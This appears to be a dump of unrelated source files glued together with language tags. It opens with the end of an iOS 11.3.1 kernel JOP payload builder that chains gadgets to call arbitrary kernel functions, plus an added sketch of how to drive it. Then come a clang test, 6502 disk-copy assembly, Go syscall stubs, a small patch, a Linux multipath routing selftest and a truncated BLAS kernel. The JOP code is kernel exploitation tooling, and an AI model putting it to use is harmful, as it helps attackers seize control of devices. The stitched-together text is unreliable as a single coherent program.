*(uint64_t *)(payload_REGION_ARGUMENTS_2_TO_8 + 0x18) = args[5];
*(uint64_t *)(payload_REGION_ARGUMENTS_2_TO_8 + 0x20) = args[6];
*(uint64_t *)(payload_REGION_ARGUMENTS_2_TO_8 + 0x28) = args[7];
*(uint64_t *)(payload_REGION_ARGUMENTS_2_TO_8 + 0x30) = args[8];
// Construct the REGION_2 region.
*(uint64_t *)(payload_REGION_2 + 0x0) = kernel_REGION_3;
// Construct the REGION_3 region.
*(uint64_t *)(payload_REGION_3 + 0x158) = gadget(GADGET_EPILOGUE_2);
// Construct the JOP stacks. We can merge them together during construction, since the link
// from JOP_STACK_1 to JOP_STACK_2 will be ignored during execution anyway.
unsigned jop_chain[] = {
// JOP_STACK_1
MOV_X23_X19__BR_X8,
GADGET_INITIALIZE_X20_1,
MOV_X25_X19__BR_X8,
GADGET_POPULATE_3,
// JOP_STACK_2
MOV_X19_X4__BR_X8,
MOV_X20_X7__BR_X8,
MOV_X23_X6__BLR_X8,
MOV_X0_X3__BLR_X8,
MOV_X24_X0__BLR_X8,
MOV_X8_X10__BR_X9,
};
struct JOP_DISPATCH_NODE {
uint64_t x2;
uint64_t x1;
} *payload_JOP_DISPATCH_NODE = (void *) payload_JOP_STACK_1;
uint64_t kernel_next_JOP_DISPATCH_NODE = kernel_JOP_STACK_1;
for (size_t i = 0; i < ARRSIZE(jop_chain); i++) {
kernel_next_JOP_DISPATCH_NODE += sizeof(*payload_JOP_DISPATCH_NODE);
payload_JOP_DISPATCH_NODE->x2 = gadget(jop_chain[i]);
payload_JOP_DISPATCH_NODE->x1 = kernel_next_JOP_DISPATCH_NODE;
payload_JOP_DISPATCH_NODE++;
}
// Set the initial arguments.
initial_state->pc = gadget(GADGET_PROLOGUE_2);
initial_state->x[0] = kernel_REGION_0;
initial_state->x[1] = kernel_JOP_STACK_1;
// Set the address at which the result will be stored.
*result_address = kernel_RESULT;
}
/*
* jop_call_strategy_6
*
* Description:
* The JOP payload described at the top of this file.
*
* Capabilities:
* Supports 8 arguments passed in registers and 8 bytes of stack arguments.
*
* Platforms:
* iOS 11.3.1 15E302: iPhone10,1
* iOS 11.3.1 15E302: iPhone6,2
*/
struct jop_call_strategy jop_call_strategy_6 = {
0x300, 0x8, check, build,
};
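/*
 * Illustrative usage sketch (not part of the original file): roughly how a
 * kernel_call front end might drive this strategy. kernel_allocate,
 * kernel_write, kernel_read, and run_kernel_thread are hypothetical helpers
 * declared here only for the sake of the example; the real interface lives
 * in the surrounding project.
 */
extern kaddr_t kernel_allocate(size_t size);
extern void kernel_write(kaddr_t address, const void *data, size_t size);
extern void kernel_read(kaddr_t address, void *data, size_t size);
extern void run_kernel_thread(const struct jop_call_initial_state *state);

uint64_t
kernel_call_sketch(uint64_t func, const uint64_t args[14]) {
	if (!check()) {
		return 0;	// a required gadget was not found
	}
	uint8_t local_payload[0x300] = { 0 };	// payload size declared in the struct above
	kaddr_t kernel_buffer = kernel_allocate(sizeof(local_payload));
	struct jop_call_initial_state initial_state;
	uint64_t result_address;
	build(func, args, kernel_buffer, local_payload, &initial_state,
			&result_address);
	kernel_write(kernel_buffer, local_payload, sizeof(local_payload));
	// Start a kernel thread at initial_state.pc with registers from initial_state.x.
	run_kernel_thread(&initial_state);
	uint64_t result;
	kernel_read(result_address, &result, sizeof(result));
	return result;
}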
| {
"language": "Assembly"
} |
// RUN: not %clang_cc1 -fsyntax-only %s
// PR1900
// This test should get a redefinition error from m_iopt.h: the MI opt
// shouldn't apply.
#define MACRO
#include "mi_opt.h"
#undef MACRO
#define MACRO || 1
#include "mi_opt.h"
| {
"language": "Assembly"
} |
.page 'disk copy'
;
; dskcpy checks for type
; and parses special cases
;
dskcpy
lda #$e0 ; kill bam buffer
sta bufuse
jsr clnbam ; clr tbam
jsr bam2x ; get bam lindx in .x
lda #$ff
sta buf0,x ; mark bam out-of-memory
lda #$0f
sta linuse ; free all lindxs
jsr prscln ; find ":"
bne dx0000
jmp duplct ; bad command error, cx=x not allowed
;
;jsr prseq
;
;lda #'* ;cpy all
;ldx #39 ;put at buffer end
;stx filtbl+1
;sta cmdbuf,x ;place *
;inx
;stx cmdsiz
;ldx #1 ;set up cnt's
;stx f1cnt
;inx
;stx f2cnt
;jmp movlp2 ;enter routine
;
dx0000 jsr tc30 ; normal parse
dx0005 jsr alldrs ; put drv's in filtbl
lda image ; get parse image
and #%01010101 ; val for patt copy
bne dx0020 ; must be concat or normal
ldx filtbl ; chk for *
lda cmdbuf,x
cmp #'*
bne dx0020
;ldx #1 ;set cnt's
; no pattern matching allowed
;stx f1cnt
;inx
;stx f2cnt
;jmp cpydtd ;go copy
dx0010 lda #badsyn ; syntax error
jmp cmderr
dx0020 lda image ; chk for normal
and #%11011001
bne dx0010
jmp copy
;.end
;prseq
; lda #'= ; special case
; jsr parse
; bne x0020
;x0015 lda #badsyn
; jmp cmderr
;x0020 lda cmdbuf,y
; jsr tst0v1
; bmi x0015
; sta fildrv+1 ; src drv
; dey
; dey
; lda cmdbuf,y
; jsr tst0v1
; bmi x0015
; cmp fildrv+1 ; cannot be equal
; beq x0015
; sta fildrv ; dest drv
; rts
;; .end
| {
"language": "Assembly"
} |
// Copyright 2019 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build !gccgo
#include "textflag.h"
//
// System call support for ARM64, NetBSD
//
// Just jump to package syscall's implementation for all these functions.
// The runtime may know about them.
TEXT ·Syscall(SB),NOSPLIT,$0-56
B syscall·Syscall(SB)
TEXT ·Syscall6(SB),NOSPLIT,$0-80
B syscall·Syscall6(SB)
TEXT ·Syscall9(SB),NOSPLIT,$0-104
B syscall·Syscall9(SB)
TEXT ·RawSyscall(SB),NOSPLIT,$0-56
B syscall·RawSyscall(SB)
TEXT ·RawSyscall6(SB),NOSPLIT,$0-80
B syscall·RawSyscall6(SB)
| {
"language": "Assembly"
} |
From 41e9e6b5aa13d65480cc960a7f15f97d74d64090 Mon Sep 17 00:00:00 2001
From: Laurent Charpentier <laurent_pubs@yahoo.com>
Date: Mon, 22 Jan 2018 10:49:45 +0100
Subject: [PATCH] fixed unknown type pid_t
Fixed 'unknown type pid_t' gcc compile error in dcbtool_cmds.c and
lldptool_cmds.c
Signed-off-by: Laurent Charpentier <laurent_pubs@yahoo.com>
---
dcbtool_cmds.c | 1 +
lldptool_cmds.c | 1 +
2 files changed, 2 insertions(+)
diff --git a/dcbtool_cmds.c b/dcbtool_cmds.c
index a5cd0fe..ee5c144 100644
--- a/dcbtool_cmds.c
+++ b/dcbtool_cmds.c
@@ -27,6 +27,7 @@
#include <stdlib.h>
#include <stdio.h>
#include <ctype.h>
+#include <sys/types.h>
#include "clif.h"
#include "dcbtool.h"
#include "lldp_dcbx_cmds.h"
diff --git a/lldptool_cmds.c b/lldptool_cmds.c
index daef8c8..c793e34 100644
--- a/lldptool_cmds.c
+++ b/lldptool_cmds.c
@@ -27,6 +27,7 @@
#include <stdio.h>
#include <stdlib.h>
#include <ctype.h>
+#include <sys/types.h>
#include "clif.h"
#include "dcb_types.h"
#include "lldptool.h"
--
2.14.3
| {
"language": "Assembly"
} |
#!/bin/bash
# SPDX-License-Identifier: GPL-2.0
ALL_TESTS="ping_ipv4 ping_ipv6 multipath_test"
NUM_NETIFS=8
source lib.sh
h1_create()
{
vrf_create "vrf-h1"
ip link set dev $h1 master vrf-h1
ip link set dev vrf-h1 up
ip link set dev $h1 up
ip address add 192.0.2.2/24 dev $h1
ip address add 2001:db8:1::2/64 dev $h1
ip route add 198.51.100.0/24 vrf vrf-h1 nexthop via 192.0.2.1
ip route add 2001:db8:2::/64 vrf vrf-h1 nexthop via 2001:db8:1::1
}
h1_destroy()
{
ip route del 2001:db8:2::/64 vrf vrf-h1
ip route del 198.51.100.0/24 vrf vrf-h1
ip address del 2001:db8:1::2/64 dev $h1
ip address del 192.0.2.2/24 dev $h1
ip link set dev $h1 down
vrf_destroy "vrf-h1"
}
h2_create()
{
vrf_create "vrf-h2"
ip link set dev $h2 master vrf-h2
ip link set dev vrf-h2 up
ip link set dev $h2 up
ip address add 198.51.100.2/24 dev $h2
ip address add 2001:db8:2::2/64 dev $h2
ip route add 192.0.2.0/24 vrf vrf-h2 nexthop via 198.51.100.1
ip route add 2001:db8:1::/64 vrf vrf-h2 nexthop via 2001:db8:2::1
}
h2_destroy()
{
ip route del 2001:db8:1::/64 vrf vrf-h2
ip route del 192.0.2.0/24 vrf vrf-h2
ip address del 2001:db8:2::2/64 dev $h2
ip address del 198.51.100.2/24 dev $h2
ip link set dev $h2 down
vrf_destroy "vrf-h2"
}
router1_create()
{
vrf_create "vrf-r1"
ip link set dev $rp11 master vrf-r1
ip link set dev $rp12 master vrf-r1
ip link set dev $rp13 master vrf-r1
ip link set dev vrf-r1 up
ip link set dev $rp11 up
ip link set dev $rp12 up
ip link set dev $rp13 up
ip address add 192.0.2.1/24 dev $rp11
ip address add 2001:db8:1::1/64 dev $rp11
ip address add 169.254.2.12/24 dev $rp12
ip address add fe80:2::12/64 dev $rp12
ip address add 169.254.3.13/24 dev $rp13
ip address add fe80:3::13/64 dev $rp13
ip route add 198.51.100.0/24 vrf vrf-r1 \
nexthop via 169.254.2.22 dev $rp12 \
nexthop via 169.254.3.23 dev $rp13
ip route add 2001:db8:2::/64 vrf vrf-r1 \
nexthop via fe80:2::22 dev $rp12 \
nexthop via fe80:3::23 dev $rp13
}
router1_destroy()
{
ip route del 2001:db8:2::/64 vrf vrf-r1
ip route del 198.51.100.0/24 vrf vrf-r1
ip address del fe80:3::13/64 dev $rp13
ip address del 169.254.3.13/24 dev $rp13
ip address del fe80:2::12/64 dev $rp12
ip address del 169.254.2.12/24 dev $rp12
ip address del 2001:db8:1::1/64 dev $rp11
ip address del 192.0.2.1/24 dev $rp11
ip link set dev $rp13 down
ip link set dev $rp12 down
ip link set dev $rp11 down
vrf_destroy "vrf-r1"
}
router2_create()
{
vrf_create "vrf-r2"
ip link set dev $rp21 master vrf-r2
ip link set dev $rp22 master vrf-r2
ip link set dev $rp23 master vrf-r2
ip link set dev vrf-r2 up
ip link set dev $rp21 up
ip link set dev $rp22 up
ip link set dev $rp23 up
ip address add 198.51.100.1/24 dev $rp21
ip address add 2001:db8:2::1/64 dev $rp21
ip address add 169.254.2.22/24 dev $rp22
ip address add fe80:2::22/64 dev $rp22
ip address add 169.254.3.23/24 dev $rp23
ip address add fe80:3::23/64 dev $rp23
ip route add 192.0.2.0/24 vrf vrf-r2 \
nexthop via 169.254.2.12 dev $rp22 \
nexthop via 169.254.3.13 dev $rp23
ip route add 2001:db8:1::/64 vrf vrf-r2 \
nexthop via fe80:2::12 dev $rp22 \
nexthop via fe80:3::13 dev $rp23
}
router2_destroy()
{
ip route del 2001:db8:1::/64 vrf vrf-r2
ip route del 192.0.2.0/24 vrf vrf-r2
ip address del fe80:3::23/64 dev $rp23
ip address del 169.254.3.23/24 dev $rp23
ip address del fe80:2::22/64 dev $rp22
ip address del 169.254.2.22/24 dev $rp22
ip address del 2001:db8:2::1/64 dev $rp21
ip address del 198.51.100.1/24 dev $rp21
ip link set dev $rp23 down
ip link set dev $rp22 down
ip link set dev $rp21 down
vrf_destroy "vrf-r2"
}
multipath4_test()
{
local desc="$1"
local weight_rp12=$2
local weight_rp13=$3
local t0_rp12 t0_rp13 t1_rp12 t1_rp13
local packets_rp12 packets_rp13
# Transmit multiple flows from h1 to h2 and make sure they are
# distributed between both multipath links (rp12 and rp13)
# according to the configured weights.
sysctl_set net.ipv4.fib_multipath_hash_policy 1
ip route replace 198.51.100.0/24 vrf vrf-r1 \
nexthop via 169.254.2.22 dev $rp12 weight $weight_rp12 \
nexthop via 169.254.3.23 dev $rp13 weight $weight_rp13
t0_rp12=$(link_stats_tx_packets_get $rp12)
t0_rp13=$(link_stats_tx_packets_get $rp13)
ip vrf exec vrf-h1 $MZ -q -p 64 -A 192.0.2.2 -B 198.51.100.2 \
-d 1msec -t udp "sp=1024,dp=0-32768"
t1_rp12=$(link_stats_tx_packets_get $rp12)
t1_rp13=$(link_stats_tx_packets_get $rp13)
let "packets_rp12 = $t1_rp12 - $t0_rp12"
let "packets_rp13 = $t1_rp13 - $t0_rp13"
multipath_eval "$desc" $weight_rp12 $weight_rp13 $packets_rp12 $packets_rp13
# Restore settings.
ip route replace 198.51.100.0/24 vrf vrf-r1 \
nexthop via 169.254.2.22 dev $rp12 \
nexthop via 169.254.3.23 dev $rp13
sysctl_restore net.ipv4.fib_multipath_hash_policy
}
multipath6_l4_test()
{
local desc="$1"
local weight_rp12=$2
local weight_rp13=$3
local t0_rp12 t0_rp13 t1_rp12 t1_rp13
local packets_rp12 packets_rp13
# Transmit multiple flows from h1 to h2 and make sure they are
# distributed between both multipath links (rp12 and rp13)
# according to the configured weights.
sysctl_set net.ipv6.fib_multipath_hash_policy 1
ip route replace 2001:db8:2::/64 vrf vrf-r1 \
nexthop via fe80:2::22 dev $rp12 weight $weight_rp12 \
nexthop via fe80:3::23 dev $rp13 weight $weight_rp13
t0_rp12=$(link_stats_tx_packets_get $rp12)
t0_rp13=$(link_stats_tx_packets_get $rp13)
$MZ $h1 -6 -q -p 64 -A 2001:db8:1::2 -B 2001:db8:2::2 \
-d 1msec -t udp "sp=1024,dp=0-32768"
t1_rp12=$(link_stats_tx_packets_get $rp12)
t1_rp13=$(link_stats_tx_packets_get $rp13)
let "packets_rp12 = $t1_rp12 - $t0_rp12"
let "packets_rp13 = $t1_rp13 - $t0_rp13"
multipath_eval "$desc" $weight_rp12 $weight_rp13 $packets_rp12 $packets_rp13
ip route replace 2001:db8:2::/64 vrf vrf-r1 \
nexthop via fe80:2::22 dev $rp12 \
nexthop via fe80:3::23 dev $rp13
sysctl_restore net.ipv6.fib_multipath_hash_policy
}
multipath6_test()
{
local desc="$1"
local weight_rp12=$2
local weight_rp13=$3
local t0_rp12 t0_rp13 t1_rp12 t1_rp13
local packets_rp12 packets_rp13
ip route replace 2001:db8:2::/64 vrf vrf-r1 \
nexthop via fe80:2::22 dev $rp12 weight $weight_rp12 \
nexthop via fe80:3::23 dev $rp13 weight $weight_rp13
t0_rp12=$(link_stats_tx_packets_get $rp12)
t0_rp13=$(link_stats_tx_packets_get $rp13)
# Generate 16384 echo requests, each with a random flow label.
for _ in $(seq 1 16384); do
ip vrf exec vrf-h1 $PING6 2001:db8:2::2 -F 0 -c 1 -q &> /dev/null
done
t1_rp12=$(link_stats_tx_packets_get $rp12)
t1_rp13=$(link_stats_tx_packets_get $rp13)
let "packets_rp12 = $t1_rp12 - $t0_rp12"
let "packets_rp13 = $t1_rp13 - $t0_rp13"
multipath_eval "$desc" $weight_rp12 $weight_rp13 $packets_rp12 $packets_rp13
ip route replace 2001:db8:2::/64 vrf vrf-r1 \
nexthop via fe80:2::22 dev $rp12 \
nexthop via fe80:3::23 dev $rp13
}
multipath_test()
{
log_info "Running IPv4 multipath tests"
multipath4_test "ECMP" 1 1
multipath4_test "Weighted MP 2:1" 2 1
multipath4_test "Weighted MP 11:45" 11 45
log_info "Running IPv6 multipath tests"
multipath6_test "ECMP" 1 1
multipath6_test "Weighted MP 2:1" 2 1
multipath6_test "Weighted MP 11:45" 11 45
log_info "Running IPv6 L4 hash multipath tests"
multipath6_l4_test "ECMP" 1 1
multipath6_l4_test "Weighted MP 2:1" 2 1
multipath6_l4_test "Weighted MP 11:45" 11 45
}
setup_prepare()
{
h1=${NETIFS[p1]}
rp11=${NETIFS[p2]}
rp12=${NETIFS[p3]}
rp22=${NETIFS[p4]}
rp13=${NETIFS[p5]}
rp23=${NETIFS[p6]}
rp21=${NETIFS[p7]}
h2=${NETIFS[p8]}
vrf_prepare
h1_create
h2_create
router1_create
router2_create
forwarding_enable
}
cleanup()
{
pre_cleanup
forwarding_restore
router2_destroy
router1_destroy
h2_destroy
h1_destroy
vrf_cleanup
}
ping_ipv4()
{
ping_test $h1 198.51.100.2
}
ping_ipv6()
{
ping6_test $h1 2001:db8:2::2
}
trap cleanup EXIT
setup_prepare
setup_wait
tests_run
exit $EXIT_STATUS
| {
"language": "Assembly"
} |
/*********************************************************************/
/* Copyright 2009, 2010 The University of Texas at Austin. */
/* All rights reserved. */
/* */
/* Redistribution and use in source and binary forms, with or */
/* without modification, are permitted provided that the following */
/* conditions are met: */
/* */
/* 1. Redistributions of source code must retain the above */
/* copyright notice, this list of conditions and the following */
/* disclaimer. */
/* */
/* 2. Redistributions in binary form must reproduce the above */
/* copyright notice, this list of conditions and the following */
/* disclaimer in the documentation and/or other materials */
/* provided with the distribution. */
/* */
/* THIS SOFTWARE IS PROVIDED BY THE UNIVERSITY OF TEXAS AT */
/* AUSTIN ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, */
/* INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF */
/* MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE */
/* DISCLAIMED. IN NO EVENT SHALL THE UNIVERSITY OF TEXAS AT */
/* AUSTIN OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, */
/* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES */
/* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE */
/* GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR */
/* BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF */
/* LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT */
/* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT */
/* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE */
/* POSSIBILITY OF SUCH DAMAGE. */
/* */
/* The views and conclusions contained in the software and */
/* documentation are those of the authors and should not be */
/* interpreted as representing official policies, either expressed */
/* or implied, of The University of Texas at Austin. */
/*********************************************************************/
#define ASSEMBLER
#include "common.h"
#if !defined(HAVE_SSE2) || !defined(HAVE_MMX)
#error You have to check your configuration.
#endif
#define STACK 16
#define ARGS 0
#define STACK_M 4 + STACK + ARGS(%esi)
#define STACK_N 8 + STACK + ARGS(%esi)
#define STACK_K 12 + STACK + ARGS(%esi)
#define STACK_ALPHA 16 + STACK + ARGS(%esi)
#define STACK_A 24 + STACK + ARGS(%esi)
#define STACK_B 28 + STACK + ARGS(%esi)
#define STACK_C 32 + STACK + ARGS(%esi)
#define STACK_LDC 36 + STACK + ARGS(%esi)
#define STACK_OFFT 40 + STACK + ARGS(%esi)
#define ALPHA 0(%esp)
#define K 16(%esp)
#define N 20(%esp)
#define M 24(%esp)
#define A 28(%esp)
#define C 32(%esp)
#define J 36(%esp)
#define OLD_STACK 40(%esp)
#define OFFSET 44(%esp)
#define KK 48(%esp)
#define KKK 52(%esp)
#define AORIG 56(%esp)
#define BORIG 60(%esp)
#define BUFFER 128(%esp)
#define STACK_ALIGN 4096
#define STACK_OFFSET 1024
#define B %edi
#define AA %edx
#define BB %ecx
#define LDC %ebp
#define PREFETCHSIZE (8 * 4)
#define KERNEL1(address) \
movq (PREFETCHSIZE + 0) * SIZE + (address) * SIZE(AA), %mm2; \
mulpd %xmm0, %xmm2; \
mulpd 2 * SIZE + (address) * SIZE(BB), %xmm0; \
addpd %xmm2, %xmm4; \
movapd 0 * SIZE + (address) * SIZE(BB), %xmm2; \
addpd %xmm0, %xmm5; \
movapd 2 * SIZE + (address) * SIZE(AA), %xmm0; \
mulpd %xmm0, %xmm2; \
mulpd 2 * SIZE + (address) * SIZE(BB), %xmm0; \
addpd %xmm2, %xmm6; \
movapd 4 * SIZE + (address) * SIZE(BB), %xmm2; \
addpd %xmm0, %xmm7; \
movapd 4 * SIZE + (address) * SIZE(AA), %xmm0
#define KERNEL2(address) \
mulpd %xmm0, %xmm2; \
mulpd 6 * SIZE + (address) * SIZE(BB), %xmm0; \
addpd %xmm2, %xmm4; \
movapd 4 * SIZE + (address) * SIZE(BB), %xmm2; \
addpd %xmm0, %xmm5; \
movapd 6 * SIZE + (address) * SIZE(AA), %xmm0; \
mulpd %xmm0, %xmm2; \
mulpd 6 * SIZE + (address) * SIZE(BB), %xmm0; \
addpd %xmm2, %xmm6; \
movapd 16 * SIZE + (address) * SIZE(BB), %xmm2; \
addpd %xmm0, %xmm7; \
movapd 16 * SIZE + (address) * SIZE(AA), %xmm0
#define KERNEL3(address) \
movq (PREFETCHSIZE + 8) * SIZE + (address) * SIZE(AA), %mm2; \
mulpd %xmm1, %xmm3; \
mulpd 10 * SIZE + (address) * SIZE(BB), %xmm1; \
addpd %xmm3, %xmm4; \
movapd 8 * SIZE + (address) * SIZE(BB), %xmm3; \
addpd %xmm1, %xmm5; \
movapd 10 * SIZE + (address) * SIZE(AA), %xmm1; \
mulpd %xmm1, %xmm3; \
mulpd 10 * SIZE + (address) * SIZE(BB), %xmm1; \
addpd %xmm3, %xmm6; \
movapd 12 * SIZE + (address) * SIZE(BB), %xmm3; \
addpd %xmm1, %xmm7; \
movapd 12 * SIZE + (address) * SIZE(AA), %xmm1
#define KERNEL4(address) \
mulpd %xmm1, %xmm3; \
mulpd 14 * SIZE + (address) * SIZE(BB), %xmm1; \
addpd %xmm3, %xmm4; \
movapd 12 * SIZE + (address) * SIZE(BB), %xmm3; \
addpd %xmm1, %xmm5; \
movapd 14 * SIZE + (address) * SIZE(AA), %xmm1; \
mulpd %xmm1, %xmm3; \
mulpd 14 * SIZE + (address) * SIZE(BB), %xmm1; \
addpd %xmm3, %xmm6; \
movapd 24 * SIZE + (address) * SIZE(BB), %xmm3; \
addpd %xmm1, %xmm7; \
movapd 24 * SIZE + (address) * SIZE(AA), %xmm1
#define KERNEL5(address) \
movq (PREFETCHSIZE + 16) * SIZE + (address) * SIZE(AA), %mm2; \
mulpd %xmm0, %xmm2; \
mulpd 18 * SIZE + (address) * SIZE(BB), %xmm0; \
addpd %xmm2, %xmm4; \
movapd 16 * SIZE + (address) * SIZE(BB), %xmm2; \
addpd %xmm0, %xmm5; \
movapd 18 * SIZE + (address) * SIZE(AA), %xmm0; \
mulpd %xmm0, %xmm2; \
mulpd 18 * SIZE + (address) * SIZE(BB), %xmm0; \
addpd %xmm2, %xmm6; \
movapd 20 * SIZE + (address) * SIZE(BB), %xmm2; \
addpd %xmm0, %xmm7; \
movapd 20 * SIZE + (address) * SIZE(AA), %xmm0
#define KERNEL6(address) \
mulpd %xmm0, %xmm2; \
mulpd 22 * SIZE + (address) * SIZE(BB), %xmm0; \
addpd %xmm2, %xmm4; \
movapd 20 * SIZE + (address) * SIZE(BB), %xmm2; \
addpd %xmm0, %xmm5; \
movapd 22 * SIZE + (address) * SIZE(AA), %xmm0; \
mulpd %xmm0, %xmm2; \
mulpd 22 * SIZE + (address) * SIZE(BB), %xmm0; \
addpd %xmm2, %xmm6; \
movapd 32 * SIZE + (address) * SIZE(BB), %xmm2; \
addpd %xmm0, %xmm7; \
movapd 32 * SIZE + (address) * SIZE(AA), %xmm0
#define KERNEL7(address) \
movq (PREFETCHSIZE + 24) * SIZE + (address) * SIZE(AA), %mm2; \
mulpd %xmm1, %xmm3; \
mulpd 26 * SIZE + (address) * SIZE(BB), %xmm1; \
addpd %xmm3, %xmm4; \
movapd 24 * SIZE + (address) * SIZE(BB), %xmm3; \
addpd %xmm1, %xmm5; \
movapd 26 * SIZE + (address) * SIZE(AA), %xmm1; \
mulpd %xmm1, %xmm3; \
mulpd 26 * SIZE + (address) * SIZE(BB), %xmm1; \
addpd %xmm3, %xmm6; \
movapd 28 * SIZE + (address) * SIZE(BB), %xmm3; \
addpd %xmm1, %xmm7; \
movapd 28 * SIZE + (address) * SIZE(AA), %xmm1
#define KERNEL8(address) \
mulpd %xmm1, %xmm3; \
mulpd 30 * SIZE + (address) * SIZE(BB), %xmm1; \
addpd %xmm3, %xmm4; \
movapd 28 * SIZE + (address) * SIZE(BB), %xmm3; \
addpd %xmm1, %xmm5; \
movapd 30 * SIZE + (address) * SIZE(AA), %xmm1; \
mulpd %xmm1, %xmm3; \
mulpd 30 * SIZE + (address) * SIZE(BB), %xmm1; \
addpd %xmm3, %xmm6; \
movapd 40 * SIZE + (address) * SIZE(BB), %xmm3; \
addpd %xmm1, %xmm7; \
movapd 40 * SIZE + (address) * SIZE(AA), %xmm1
PROLOGUE
pushl %ebp
pushl %edi
pushl %esi
pushl %ebx
PROFCODE
EMMS
movl %esp, %esi # save old stack
subl $128 + LOCAL_BUFFER_SIZE + STACK_OFFSET, %esp
andl $-STACK_ALIGN, %esp
addl $STACK_OFFSET, %esp
STACK_TOUCHING
movd STACK_M, %mm0
movl STACK_N, %eax
movd STACK_K, %mm1
movd STACK_A, %mm2
movl STACK_B, B
movd STACK_C, %mm3
movl STACK_LDC, LDC
movd STACK_OFFT, %mm4
movd %mm1, K
movl %eax, N
movd %mm0, M
movd %mm2, A
movd %mm3, C
movl %esi, OLD_STACK
movd %mm4, OFFSET
movd %mm4, KK
sall $BASE_SHIFT, LDC
#ifdef LN
movl M, %eax
leal (, %eax, SIZE), %eax
addl %eax, C
imull K, %eax
addl %eax, A
#endif
#ifdef RT
movl N, %eax
leal (, %eax, SIZE), %eax
imull K, %eax
addl %eax, B
movl N, %eax
imull LDC, %eax
addl %eax, C
#endif
#ifdef RN
negl KK
#endif
#ifdef RT
movl N, %eax
subl OFFSET, %eax
movl %eax, KK
#endif
movl N, %eax
sarl $1, %eax
movl %eax, J
jle .L100
ALIGN_2
.L01:
/* Copying to Sub Buffer */
#ifdef LN
movl OFFSET, %eax
addl M, %eax
movl %eax, KK
#endif
leal BUFFER, %ecx
#ifdef RT
movl K, %eax
sall $1 + BASE_SHIFT, %eax
subl %eax, B
#endif
#if defined(LN) || defined(RT)
movl KK, %eax
movl B, BORIG
leal (, %eax, SIZE), %eax
leal (B, %eax, 2), B
leal (BB, %eax, 4), BB
#endif
#ifdef LT
movl OFFSET, %eax
movl %eax, KK
#endif
#if defined(LT) || defined(RN)
movl KK, %eax
#else
movl K, %eax
subl KK, %eax
#endif
sarl $2, %eax
jle .L03
ALIGN_2
.L02:
movsd 0 * SIZE(B), %xmm0
movsd 1 * SIZE(B), %xmm1
movsd 2 * SIZE(B), %xmm2
movsd 3 * SIZE(B), %xmm3
movsd 4 * SIZE(B), %xmm4
movsd 5 * SIZE(B), %xmm5
movsd 6 * SIZE(B), %xmm6
movsd 7 * SIZE(B), %xmm7
unpcklpd %xmm0, %xmm0
unpcklpd %xmm1, %xmm1
unpcklpd %xmm2, %xmm2
unpcklpd %xmm3, %xmm3
unpcklpd %xmm4, %xmm4
unpcklpd %xmm5, %xmm5
unpcklpd %xmm6, %xmm6
unpcklpd %xmm7, %xmm7
movapd %xmm0, 0 * SIZE(%ecx)
movapd %xmm1, 2 * SIZE(%ecx)
movapd %xmm2, 4 * SIZE(%ecx)
movapd %xmm3, 6 * SIZE(%ecx)
movapd %xmm4, 8 * SIZE(%ecx)
movapd %xmm5, 10 * SIZE(%ecx)
movapd %xmm6, 12 * SIZE(%ecx)
movapd %xmm7, 14 * SIZE(%ecx)
prefetcht0 104 * SIZE(B)
addl $ 8 * SIZE, B
addl $16 * SIZE, %ecx
decl %eax
jne .L02
ALIGN_2
.L03:
#if defined(LT) || defined(RN)
movl KK, %eax
#else
movl K, %eax
subl KK, %eax
#endif
andl $3, %eax
BRANCH
jle .L05
ALIGN_4
.L04:
movsd 0 * SIZE(B), %xmm0
movsd 1 * SIZE(B), %xmm1
unpcklpd %xmm0, %xmm0
unpcklpd %xmm1, %xmm1
movapd %xmm0, 0 * SIZE(%ecx)
movapd %xmm1, 2 * SIZE(%ecx)
addl $2 * SIZE, B
addl $4 * SIZE, %ecx
decl %eax
jne .L04
ALIGN_4
.L05:
#if defined(LT) || defined(RN)
movl A, AA
#else
movl A, %eax
movl %eax, AORIG
#endif
leal (, LDC, 2), %eax
#ifdef RT
subl %eax, C
#endif
movl C, %esi # coffset = c
#ifndef RT
addl %eax, C
#endif
movl M, %ebx
sarl $2, %ebx # i = (m >> 2)
jle .L30
ALIGN_4
.L10:
#ifdef LN
movl K, %eax
sall $2 + BASE_SHIFT, %eax
subl %eax, AORIG
#endif
#if defined(LN) || defined(RT)
movl KK, %eax
movl AORIG, AA
leal (, %eax, SIZE), %eax
leal (AA, %eax, 4), AA
#endif
leal BUFFER, BB
#if defined(LN) || defined(RT)
movl KK, %eax
sall $1 + BASE_SHIFT, %eax
leal (BB, %eax, 2), BB
#endif
movapd 0 * SIZE(BB), %xmm2
pxor %xmm4, %xmm4
movapd 0 * SIZE(AA), %xmm0
pxor %xmm5, %xmm5
movapd 8 * SIZE(BB), %xmm3
pxor %xmm6, %xmm6
movapd 8 * SIZE(AA), %xmm1
pxor %xmm7, %xmm7
prefetcht2 4 * SIZE(%esi)
prefetcht2 4 * SIZE(%esi, LDC)
#if defined(LT) || defined(RN)
movl KK, %eax
#else
movl K, %eax
subl KK, %eax
#endif
#ifdef PENTIUM4
andl $-8, %eax
NOBRANCH
je .L12
sall $3, %eax
.L1X:
KERNEL1(32 * 0)
KERNEL2(32 * 0)
KERNEL3(32 * 0)
KERNEL4(32 * 0)
KERNEL5(32 * 0)
KERNEL6(32 * 0)
KERNEL7(32 * 0)
KERNEL8(32 * 0)
cmpl $64 * 1, %eax
NOBRANCH
jle .L11
KERNEL1(32 * 1)
KERNEL2(32 * 1)
KERNEL3(32 * 1)
KERNEL4(32 * 1)
KERNEL5(32 * 1)
KERNEL6(32 * 1)
KERNEL7(32 * 1)
KERNEL8(32 * 1)
cmpl $64 * 2, %eax
NOBRANCH
jle .L11
KERNEL1(32 * 2)
KERNEL2(32 * 2)
KERNEL3(32 * 2)
KERNEL4(32 * 2)
